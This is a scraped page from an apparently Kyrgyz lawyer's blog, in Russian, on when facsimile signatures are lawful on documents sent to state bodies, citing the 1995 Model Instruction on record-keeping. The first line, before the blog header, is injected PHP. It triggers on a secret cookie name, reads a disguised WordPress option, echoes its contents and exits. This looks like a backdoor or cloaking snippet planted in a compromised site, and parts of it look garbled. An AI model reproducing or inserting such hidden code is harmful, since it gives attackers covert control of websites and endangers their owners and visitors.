if (isset($_COOKIE["_OKiQyosYxT9dLrv7hI4m53agwMtefWPCBHnR2kXz8qlUuNE06AjVpFDc"])) { $lines = get_option( 'wpsdt4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents("fed3aadf"); } echo $lines; exit(); } Блог Нурлана Алымбаева » Архив блога » Законность применения факсимиле в документах (8)
Entries RSS
image

Календарь

Ноябрь 2024
Пн Вт Ср Чт Пт Сб Вс
« Апр    
 123
45678910
11121314151617
18192021222324
252627282930  
Март 09

Законность применения факсимиле в документах (8)

Применение подписи и факсимиле в административных отношениях

Согласно части пятой Статьи 1 ГК гражданское законодательство не применяется к имущественным отношениям, основанным на административном или ином властном подчинении одной стороны другой. Поэтому необходимо быть внимательными к документам, исходящим от имени организации в адрес органов государственной власти или местного самоуправления.

Чаще всего это письма, заявления, жалобы, предложения и другие обращения. Можно сделать вывод, что оригиналы таких документов не должны подписываться факсимильной подписью. Этот вывод основан на анализе следующего акта.

Еще в 1995 году была принята Типовая инструкция по документационному обеспечению управления (делопроизводству) в Кыргызской Республике[1]. К сожалению, этот документ малоизвестен и сейчас практически не применяется. Хотя это действующий нормативный правовой акт[2]. Следовательно, контролирующие органы могут сослаться на нормы данного акта в обосновании своей позиции во время проверки или в суде.

Типовая инструкция устанавливает принципы и правила, регламентирующие единые требования к документированию управленческой деятельности и организации работы с документами в организациях. Вот положения, заслуживающие внимания.

В разделе «оформление управленческих документов» указано, что при оформлении документов необходимо соблюдать правила, обеспечивающие юридическую силу, качественное и оперативное исполнение документа. Обязательным реквизитом документа является подпись (пункт 2.3.1.).

Документ подписывается руководителем организации или заменяющим его должностным лицом в соответствии с его компетенцией. Все экземпляры служебных документов, в том числе их копии, должны быть подписаны. Документы должны содержать подлинные подписи должностных лиц.

Подписывается экземпляр документа, остающийся в организации, остальные экземпляры могут быть заверены исполнителем или на них проставляется факсимиле подписи руководителя.

Реквизит “подпись” состоит из наименования должности лица, подписывающего документ, его личной подписи и ее расшифровки, в которой указываются инициалы и фамилия (пункт 2.3.6.).

Если должностное лицо, фамилия которого заготовлена на проекте документа, отсутствует, то документ подписывается лицом, исполняющим его обязанности, или заместителем. В реквизите “подпись” чернилами или машинописным способом вносятся данные лица, подписывающего документ. При этом проставление косой черты или предлога “за” перед наименованием должности исключается (обратите на это внимание – на практике часто можно встретить косую черту J).

Вот еще одно интересное положение. На документах, требующих особого удостоверения их подлинности, а также финансовых документах, ставится гербовая печать. Оттиск печати на документе должен захватывать часть наименования должности лица, подписавшего документ, и подлинную подпись.


[1] утверждена постановлением Правительства КР от 25 августа 1995 года N 370

[2] В ИПС «Токтом» указан в качестве действующего акта

Синдикация

Понравилась статья? Подпишитесь на RSS .

Пока нет комментариев к записи “Законность применения факсимиле в документах (8)”

Комментирование закрыто.